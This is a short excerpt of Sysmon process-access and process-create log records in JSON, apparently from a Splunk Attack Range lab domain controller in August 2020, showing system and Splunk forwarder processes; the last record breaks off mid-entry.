{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1200-5F25-0000-0010BA200900}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1200-5F25-0000-0010BA200900}","TargetProcessId":"4892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.752\r\nSourceProcessGUID: {E2A3D6B1-1200-5F25-0000-0010BA200900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 1392\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.752","SourceProcessGUID":"{E2A3D6B1-1200-5F25-0000-0010BA200900}","SourceProcessId":"4892","SourceThreadId":"1392","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.534\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.534","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.941\r\nProcessGuid: {E2A3D6B1-1201-5F25-0000-001022230900}\r\nProcessId: 4812\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: 